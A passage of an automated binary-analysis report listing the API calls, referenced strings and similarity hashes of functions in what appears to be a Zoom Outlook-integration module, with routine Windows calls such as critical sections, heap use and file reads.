                  • Part of subcall function 00C5DA1D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.mapi.outlook.on.get.default.profile.notify), ref: 00C5DA6A
                  • Part of subcall function 00C5DA1D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ ref: 00C5DAA7
                  • Part of subcall function 00C5DA1D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.mapi.outlook.on.get.default.profile.notify), ref: 00C5DAD9
                  • Part of subcall function 00C5DA1D: EnterCriticalSection.KERNEL32(?), ref: 00C5DB3B
                  • Part of subcall function 00C5DA1D: LeaveCriticalSection.KERNEL32(?,?), ref: 00C5DB58
                Strings
                • count, xrefs: 00C5C841
                • strDefaultProfile, xrefs: 00C5C846
                • com.zoom.app.mapi.outlook.on.get.default.profile.notify, xrefs: 00C5C850
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@Cmm@@_EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.mapi.outlook.on.get.default.profile.notify$count$strDefaultProfile
                • API String ID: 586599499-1231143739
                • Opcode ID: 221378d8d7fd2a88e06d005550d1d89db22098090b2b2715d2a80b1db3b9483c
                • Instruction ID: 4a0a6a9f2299829bbb881f62bb679ed56abf1d7ad4670b211215597f6ebfa662
                • Opcode Fuzzy Hash: 221378d8d7fd2a88e06d005550d1d89db22098090b2b2715d2a80b1db3b9483c
                • Instruction Fuzzy Hash: ECE020F0E403909BC7107B65AC06B2DB6A06B10B52F008618F5101A3C2CFF8458CDF7D
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00D5F9F0,00000010,00CE8613,00000001,?,?,?,00D5FA10,00000008,00CE8697,00000001,?,?,00000000,?,?), ref: 00CE8500
                • ___AdjustPointer.LIBCMT ref: 00CE8568
                • ___AdjustPointer.LIBCMT ref: 00CE858B
                • ___AdjustPointer.LIBCMT ref: 00CE8627
                Similarity
                • API ID: AdjustPointer$Cmm@@State@Unlock@
                • String ID:
                • API String ID: 2638859718-0
                • Opcode ID: 7ac89c56fb92e8f67a0aa629db6dbaefef81eff721dc168f25b891c642a0c68a
                • Instruction ID: 173009e38507d5c029fe45c2b69fa0ab27a0f3b03058e285f857997cd60aeddb
                • Opcode Fuzzy Hash: 7ac89c56fb92e8f67a0aa629db6dbaefef81eff721dc168f25b891c642a0c68a
                • Instruction Fuzzy Hash: F551F372602686DFEB298F12C841BBA73A4EF50710F14452DEC1A572E1DF31ED49DB90
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB632E
                • GetTickCount.KERNEL32 ref: 00CB635C
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(00000000,00D33368,?,0000006C,00CB739B,?,?,?,?,00000000,?,?,?,?), ref: 00CB6394
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@PB_W@Z.RWSNDPQSKZ(?,00D3D264,?,0000006C,00CB739B,?,?,?,?,00000000,?,?,?,?), ref: 00CB63A7
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,?,0000006C,00CB739B,?,?,?,?,00000000,?,?,?,?), ref: 00CB63B7
                Similarity
                • API ID: Cmm@@String$V01@$CountDeallocateH_prolog3_String@TickV01@@W@1@@
                • String ID:
                • API String ID: 3329691095-0
                • Opcode ID: d57143a4fe07b6261308f3fb8c4b6d0a5f8127280142805f9d6940c5b5867bd2
                • Instruction ID: ec142894f740256c0d6b8cd049d8228784d87440339fd418d10446824f184b40
                • Opcode Fuzzy Hash: d57143a4fe07b6261308f3fb8c4b6d0a5f8127280142805f9d6940c5b5867bd2
                • Instruction Fuzzy Hash: B4514DB1900208EFCF14EFA5C8859EEBBB9FF58310F144119F905A7252DB34AA88DF60
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5EC33
                • #11.MAPI32(00000000,00000000,00000000,80000041,?,00000024,00C5C31F), ref: 00C5EC51
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5ECCB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,80000000,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5ECF1
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000100,?,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5ED14
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3_
                • String ID:
                • API String ID: 2729597131-0
                • Opcode ID: 8e88876212883e7612d95d653ef727104fd9b30847ebe937d6723ada3563da0a
                • Instruction ID: 9047ae16d23a1a7b13331d6b4bf720653e1f8aea6a9f43c1e0ddf6e5caf22981
                • Opcode Fuzzy Hash: 8e88876212883e7612d95d653ef727104fd9b30847ebe937d6723ada3563da0a
                • Instruction Fuzzy Hash: CF315E79A002199BDB18CFA5D884AEEBBB5FF48305F544018E912B7250DB71BE89CB64
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB6237
                • ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ.RWSNDPQSKZ(?,0000001C,00CB4E3D,?), ref: 00CB625D
                  • Part of subcall function 00CB5200: __EH_prolog3.LIBCMT ref: 00CB5207
                  • Part of subcall function 00CB5200: EnterCriticalSection.KERNEL32(00DFFB3C,00000020,00CB5E5B,?,0000001C,00CB4DB0,?), ref: 00CB5215
                  • Part of subcall function 00CB5200: LeaveCriticalSection.KERNEL32(00DFFB3C,?,?), ref: 00CB52C4
                • EnterCriticalSection.KERNEL32(?,0000001C,00CB4E3D,?), ref: 00CB6276
                • SetEvent.KERNEL32(000000C8,?,00000005,?,?,?,?,?,?,?,000000C8), ref: 00CB62F8
                  • Part of subcall function 00CB9C14: __EH_prolog3.LIBCMT ref: 00CB9C1B
                  • Part of subcall function 00CB9C14: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,000000C8), ref: 00CB9C42
                • LeaveCriticalSection.KERNEL32(?,000000C8), ref: 00CB6302
                Similarity
                • API ID: CriticalSection$H_prolog3$EnterLeavePerfThread$??0?$Cmm@@EventEvents@StringTelemetry@Telemetry@@Telemetry@@@std@@V01@@V?$shared_ptr@
                • String ID:
                • API String ID: 988690219-0
                • Opcode ID: 9651e9da36570fd5912f56ba412d9f3f600b87e80d4a6f6523abe9a8c65ccfee
                • Instruction ID: 7d9cab4bfc8b0a76e8dce8316a50cf17883a7979a4b0030cfc58572ff86a1a04
                • Opcode Fuzzy Hash: 9651e9da36570fd5912f56ba412d9f3f600b87e80d4a6f6523abe9a8c65ccfee
                • Instruction Fuzzy Hash: B13159B190020AEBDF01DFE4C985AEEBBB9FF08300F104525F915A7251CB74AA85DBA0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB67C7
                • ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ.RWSNDPQSKZ(?,00000020), ref: 00CB67ED
                  • Part of subcall function 00CB5200: __EH_prolog3.LIBCMT ref: 00CB5207
                  • Part of subcall function 00CB5200: EnterCriticalSection.KERNEL32(00DFFB3C,00000020,00CB5E5B,?,0000001C,00CB4DB0,?), ref: 00CB5215
                  • Part of subcall function 00CB5200: LeaveCriticalSection.KERNEL32(00DFFB3C,?,?), ref: 00CB52C4
                • EnterCriticalSection.KERNEL32(?,00000020), ref: 00CB6806
                • SetEvent.KERNEL32(000000C8,?,00000007,?,?,?,?,?,?,?,?,000000C8), ref: 00CB6888
                • LeaveCriticalSection.KERNEL32(?,000000C8), ref: 00CB6892
                Similarity
                • API ID: CriticalSection$EnterH_prolog3LeavePerfThread$EventEvents@Telemetry@Telemetry@@Telemetry@@@std@@V?$shared_ptr@
                • String ID:
                • API String ID: 3492326977-0
                • Opcode ID: 91e6586ecc71e922e86830f5f11a51a9d0a673040de2cfa446808cea3c4c5764
                • Instruction ID: 6fb62bf56608b392042f40f013ab3e6440a70dcb47a031ed3a7ac5206869c8ff
                • Opcode Fuzzy Hash: 91e6586ecc71e922e86830f5f11a51a9d0a673040de2cfa446808cea3c4c5764
                • Instruction Fuzzy Hash: E4315EB190021AEFCF01DFA4C9859EEBBB9FF08300F544525F905E7291CB74AA55DBA0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB64E7
                • ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ.RWSNDPQSKZ(?,00000014,00CB50B4,?,?,00000000,?,?,?,?,?,00D10300,000000FF), ref: 00CB6500
                • EnterCriticalSection.KERNEL32(?,00000014,00CB50B4,?,?,00000000,?,?,?,?,?,00D10300,000000FF), ref: 00CB651A
                • SetEvent.KERNEL32(000000C8,?,?,?,?,000000C8,?,000000C8,?,?,?,00D10300,000000FF), ref: 00CB659B
                • LeaveCriticalSection.KERNEL32(?,000000C8,?,?,?,00D10300,000000FF), ref: 00CB65A5
                Similarity
                • API ID: CriticalPerfSectionThread$EnterEventEvents@H_prolog3LeaveTelemetry@Telemetry@@Telemetry@@@std@@V?$shared_ptr@
                • String ID:
                • API String ID: 1684062195-0
                • Opcode ID: 36bad1bfd16e79a3ca9421500063995dbc59001ab86b19ca9d82ed64a3feb452
                • Instruction ID: 55cf17e5df1b18a4f722370d4d5c2b466330828fddab6f388d426c3b9d604630
                • Opcode Fuzzy Hash: 36bad1bfd16e79a3ca9421500063995dbc59001ab86b19ca9d82ed64a3feb452
                • Instruction Fuzzy Hash: B1214C7190025AAFCF15DFA4CC84AEEBB79FF08304F104415F515E7250CB74AA65DBA0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBAD57
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?,?,00000000,00000008), ref: 00CBAD65
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?,?,00000000), ref: 00CBAD75
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?), ref: 00CBADC7
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?), ref: 00CBAE6D
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3
                • String ID:
                • API String ID: 709177685-0
                • Opcode ID: 1792ed7b049db2113fff7d11f63860a1fb711eb01153ce4e0ab32b3b93b3ed57
                • Instruction ID: 1ade5c7aa119a6b6e75958393736d3a9434fca659e6ead5890491f088f0bb54a
                • Opcode Fuzzy Hash: 1792ed7b049db2113fff7d11f63860a1fb711eb01153ce4e0ab32b3b93b3ed57
                • Instruction Fuzzy Hash: 95412CB8A00B45AFC358CF29C180B96F7E0BF19304F40891EE9AAC3B41DB71B954DB91
                APIs
                • ?Stop@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ(?,?,?,?,?,?,00C5CBAB), ref: 00C5CBF0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC05
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC1B
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC25
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC49
                Similarity
                • API ID: Cmm@@CriticalSectionState@Unlock@$ChannelEnterLeaveStop@Thread@ssb_ipc@@
                • String ID:
                • API String ID: 2446349498-0
                • Opcode ID: 8d20171d0d73463125ea60963a57491a9d45f7a9693fc35ba5fddf13efb07967
                • Instruction ID: 08402fcd5903fcc2a7aab588456400e9106357eb408217627a90f81d2dd4b866
                • Opcode Fuzzy Hash: 8d20171d0d73463125ea60963a57491a9d45f7a9693fc35ba5fddf13efb07967
                • Instruction Fuzzy Hash: 71218E79600B16AFDB149F52D885A5AB7A8FF08712F004128ED069B341CB70FD89CBA8
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC28A
                • GetProcessHeap.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC29C
                • HeapAlloc.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2A3
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2BF
                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2CB
                • HeapFree.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2D2
                Similarity
                • API ID: Heap$ByteCharMultiProcessWide$AllocFree
                • String ID:
                • API String ID: 1621643742-0
                • Opcode ID: 7b5aac336e7fff9f0166d07c373b185611bc98dd063ab9956ff08b3c12240903
                • Instruction ID: 27bba9adbc8c2546c44162c1b359495b1782536f622d191738efde90124340c1
                • Opcode Fuzzy Hash: 7b5aac336e7fff9f0166d07c373b185611bc98dd063ab9956ff08b3c12240903
                • Instruction Fuzzy Hash: FA118271600205BFDB219B96CC48FAB7BBEEB89751F20421DF615D6290DB70DA02D770
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C62D97
                  • Part of subcall function 00C613F7: CreateFileW.KERNEL32(?,?,00000003,00000000,?,00000080,00000000,?,?,00C615C6,00000003,?), ref: 00C61417
                • ?GetSize@CFile@Cmm@@QBE_KXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DE5
                  • Part of subcall function 00C617D0: GetFileSize.KERNEL32(?,?), ref: 00C617E3
                • ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DEF
                • ?Read@CFile@Cmm@@QAEIPAXI@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DF8
                • ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62E34
                Similarity
                • API ID: Cmm@@$File@$File$Buffer@?$Close@CreateH_prolog3_Read@SizeSize@String
                • String ID:
                • API String ID: 2759880864-0
                • Opcode ID: 8e5f79f3acff214a4ea9a6270b7dff2c83ffc4f523f492a14cd41ca9b12e38a2
                • Instruction ID: 9918140f1862a1a965ea1539c36e46436bad37a143006351b4621fcefe1ecaa7
                • Opcode Fuzzy Hash: 8e5f79f3acff214a4ea9a6270b7dff2c83ffc4f523f492a14cd41ca9b12e38a2
                • Instruction Fuzzy Hash: 72118E72D0120CAECF11DFF4D881ADEBBB1AF04311F244029F911BB681EB706A49DB64
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA8897
                • ?GetNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEPAV123@ABVCCmmArchivePath@3@@Z.RWSNDPQSKZ(?,0000003C), ref: 00CA88A0
                  • Part of subcall function 00CA8A60: ?NameAt@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@I@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A8D
                  • Part of subcall function 00CA8A60: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A9A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA88D1
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ?ToString@CCmmArchivePath@Cmm@@QBEXABV?$CStringT@_W@2@AAV32@@Z.RWSNDPQSKZ(?,?,00D3C860,?,?,?,?,?,0000003C), ref: 00CA88E4
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA8932
                Similarity
                • API ID: Cmm@@$ArchiveString$??0?$Node@Path@W@2@$Archive@H_prolog3H_prolog3_NamePath@3@@State@String@TreeUnlock@V123@V32@@
                • String ID:
                • API String ID: 276706240-0
                • Opcode ID: 56215b04d38fd81a5f2bc03c7f5e8029da56d28b0b320d00fad6a5a96898b93c
                • Instruction ID: c782d067c3a460760833fcf24713ced1db1cc246e2d1d517b3c51c4a00c8459f
                • Opcode Fuzzy Hash: 56215b04d38fd81a5f2bc03c7f5e8029da56d28b0b320d00fad6a5a96898b93c
                • Instruction Fuzzy Hash: 61113A74D00209DFCB00DFB5C4416EEBBB4EF08718F64506AE405B7241EB749B89DB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA8957
                • ?GetNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEPAV123@ABVCCmmArchivePath@3@@Z.RWSNDPQSKZ(?,0000003C), ref: 00CA8960
                  • Part of subcall function 00CA8A60: ?NameAt@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@I@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A8D
                  • Part of subcall function 00CA8A60: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A9A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA8991
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ?ToString@CCmmArchivePath@Cmm@@QBEXABV?$CStringT@_W@2@AAV32@@Z.RWSNDPQSKZ(?,?,00D3C860,?,?,?,?,?,0000003C), ref: 00CA89A4
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA89F2
                Similarity
                • API ID: Cmm@@$ArchiveString$??0?$Node@Path@W@2@$Archive@H_prolog3H_prolog3_NamePath@3@@State@String@TreeUnlock@V123@V32@@
                • String ID:
                • API String ID: 276706240-0
                • Opcode ID: 91edea6b6e712b1053b947c1a75488972b2244bbf1756c97b0c31f847f08521a
                • Instruction ID: f5b7259ff02fee4bea02b1d9a3e9fb48f6840b97403614d79e8e7a3583622e59
                • Opcode Fuzzy Hash: 91edea6b6e712b1053b947c1a75488972b2244bbf1756c97b0c31f847f08521a
                • Instruction Fuzzy Hash: 02113774D00249DFCB04DFB4C4416EEBBB4EF08718F14942AE405B7240EB749B89EBAA
                APIs
                • ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000,?,?,000000FF), ref: 00CA8755
                • ?SetName@CCmmArchiveTreeNode@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z.RWSNDPQSKZ(?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000,?,?), ref: 00CA8766
                • ?Assign@CCmmArchiveVarivant@Cmm@@IAEXABV12@@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000,?), ref: 00CA878A
                  • Part of subcall function 00CA9920: ?SetString@CCmmArchiveVarivant@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00000000,?,00000000,?,00CA878F,?,?,?,00000000,?,?,00CA5031,?,?,?,?), ref: 00CA9949
                • ?Duplicate@CCmmArchiveTreeNode@Archive@Cmm@@QAEPAV123@H@Z.RWSNDPQSKZ(?,?,?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000), ref: 00CA8799
                • ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,?,?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000), ref: 00CA87A5
                Similarity
                • API ID: ArchiveCmm@@$Archive@Node@Tree$Varivant@$AppendAssign@Child@Duplicate@Name@StringString@V123@V123@@V12@@W@3@@
                • String ID:
                • API String ID: 653431653-0
                • Opcode ID: 3549b46a8bc1adf1107df48fc6e617d9635882fddc67f8975ac84b3e2b8b5139
                • Instruction ID: 5584174270631f6c94186186f3f415e557323744fc82d476d0fac8e62a8c9d1a
                • Opcode Fuzzy Hash: 3549b46a8bc1adf1107df48fc6e617d9635882fddc67f8975ac84b3e2b8b5139
                • Instruction Fuzzy Hash: 78018C75A00A06AB8754DB25C54195BF7E9FB897247100529F80AC7B00EF30F914DBD0
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C667
                • ??0CCmmArchiveObjHelper@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(00000003,00000008,00CAC4ED,000000FF), ref: 00C5C688
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000008,00000003,00000008,00CAC4ED,000000FF), ref: 00C5C69A
                • ?FlatternToMsg@CCmmMessageHelper@Cmm@@YAPAVCmmMQ_Msg@2@PAVCCmmArchiveObjHelper@2@H@Z.RWSNDPQSKZ(00000008,?), ref: 00C5C6B8
                • ??1CCmmArchiveObjHelper@Cmm@@QAE@XZ.RWSNDPQSKZ ref: 00C5C6C4
                Similarity
                • API ID: Cmm@@$ArchiveHelper@$FlatternH_prolog3Helper@2@MessageMsg@Msg@2@State@Unlock@
                • String ID:
                • API String ID: 1744004279-0
                • Opcode ID: 73d835ea9a2da49726cc2bcc635f6c243f5651e0901fe8bcbdb8ea8b8bab8eb5
                • Instruction ID: 902aa7855edef6f07084e83e1f2d5780bf30ff150d17d899998ce0c85df9985f
                • Opcode Fuzzy Hash: 73d835ea9a2da49726cc2bcc635f6c243f5651e0901fe8bcbdb8ea8b8bab8eb5
                • Instruction Fuzzy Hash: EE018B756002069FCB04EFA4D9C08AEB7B1AF54315B60412AF812DB2A1DF70EE84DBA5
                APIs
                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CDD34D), ref: 00D0E648
                • HeapAlloc.KERNEL32(00000000), ref: 00D0E64F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00D0E67C
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D0E695
                • HeapFree.KERNEL32(00000000), ref: 00D0E69C
                  • Part of subcall function 00D0E4E1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D0E68B,00000000), ref: 00D0E505
                  • Part of subcall function 00D0E4E1: HeapAlloc.KERNEL32(00000000), ref: 00D0E50C
                Similarity
                • API ID: Heap$Process$Alloc$Cmm@@FreeState@Unlock@
                • String ID:
                • API String ID: 3289356700-0
                • Opcode ID: 2ab5b78aee55d4611ad1398fa44dac7348e6610296aa683e5bc9d8fd1c3e9df6
                • Instruction ID: e13b7f4b4072d03a01e2975b76cbd1286794834b594b29e03cd24e0343d4e0cc
                • Opcode Fuzzy Hash: 2ab5b78aee55d4611ad1398fa44dac7348e6610296aa683e5bc9d8fd1c3e9df6
                • Instruction Fuzzy Hash: 66F09672644721ABC72027787D0879A3B66AF94751B168C29F54AC7384DF71C8028770
                APIs
                • _free.LIBCMT ref: 00D0801F
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00D08031
                • _free.LIBCMT ref: 00D08043
                • _free.LIBCMT ref: 00D08055
                • _free.LIBCMT ref: 00D08067
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: d43e8a7193663ad4731134cb6a6ce36314572fe9121e463d4ab21c1976fcebe2
                • Instruction ID: b843c510917cf035a9ebf266b4401980950f40f9123ec7114ca658585068c468
                • Opcode Fuzzy Hash: d43e8a7193663ad4731134cb6a6ce36314572fe9121e463d4ab21c1976fcebe2
                • Instruction Fuzzy Hash: 77F06232500284EBC670EB54E8C6D2A73DABA0076479C0C09F19DDB6A0DB70FD806BB1
                APIs
                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000080,00000003,?,?,00CBE6C5,00000000), ref: 00CBE352
                • GetLastError.KERNEL32(?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE35E
                • ImpersonateLoggedOnUser.ADVAPI32(00000000,?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 00CBE375
                • GetLastError.KERNEL32(?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE381
                • CloseHandle.KERNEL32(00000000,?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 00CBE388
                Similarity
                • API ID: ErrorLast$CloseHandleImpersonateLoggedOpenProcessUser
                • String ID:
                • API String ID: 947513347-0
                • Opcode ID: d8538b479ba482af3bc53996b702d87cb0f98d8ad6b2a3dc6f95b863f90525f3
                • Instruction ID: fab24520d8d1e4ef349348a4c4c694788e9ff15127d7048fcd660035948ec133
                • Opcode Fuzzy Hash: d8538b479ba482af3bc53996b702d87cb0f98d8ad6b2a3dc6f95b863f90525f3
                • Instruction Fuzzy Hash: E4F030B6641726BB87211F669C488DABEAAEB55BA17108126F915C3311CF70C912D7F0
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB286A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB2880
                • ??0XMLPrinter@tinyxml2@@QAE@PAU_iobuf@@_NH@Z.RWSNDPQSKZ(00000000,00000000,00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB289F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000,00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB28B5
                • ??1XMLPrinter@tinyxml2@@UAE@XZ.RWSNDPQSKZ ref: 00CB28C5
                Similarity
                • API ID: Cmm@@Printer@tinyxml2@@State@Unlock@$H_prolog3_U_iobuf@@_
                • String ID:
                • API String ID: 1935669353-0
                • Opcode ID: a0939341481946f5f36e3dcac51942863bedf866d9346b4e68a1df9567c1848e
                • Instruction ID: d48d172b826b23e087756accd70fbb23bc203d95d3a1bf4946e841e248616b19
                • Opcode Fuzzy Hash: a0939341481946f5f36e3dcac51942863bedf866d9346b4e68a1df9567c1848e
                • Instruction Fuzzy Hash: BDF06D75A002249BCB19AB52DC95AFE7B35EF98310F000059F80B97391DFB06E81EEA1
                APIs
                • EnterCriticalSection.KERNEL32(00DFECA8,00DFFC8C,?,00C62C03,00DFFC8C), ref: 00CE4DBA
                • LeaveCriticalSection.KERNEL32(00DFECA8,?,00C62C03,00DFFC8C), ref: 00CE4DED
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00DFECA0,?,00DFFC8C), ref: 00CE4E5E
                • SetEvent.KERNEL32(?,00DFFC8C), ref: 00CE4E6E
                • ResetEvent.KERNEL32(?,00DFFC8C), ref: 00CE4E7A
                Similarity
                • API ID: CriticalEventSection$Cmm@@EnterLeaveResetState@Unlock@
                • String ID:
                • API String ID: 3897195861-0
                • Opcode ID: ba1fd928daca65cda8ea582a2e4aa17912a8d4b8c5316d567273ee54fb903478
                • Instruction ID: 116b72da0d12f16287f9703c556090d049fe8d8797f139f7a23c89adf94a85f3
                • Opcode Fuzzy Hash: ba1fd928daca65cda8ea582a2e4aa17912a8d4b8c5316d567273ee54fb903478
                • Instruction Fuzzy Hash: A601FB31901764AFC715AF19FD589E57BA5FB497117028065F902CB370CB745806CBA5
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB274A
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,000000F4,00CB2725,00000000,?), ref: 00CB2757
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
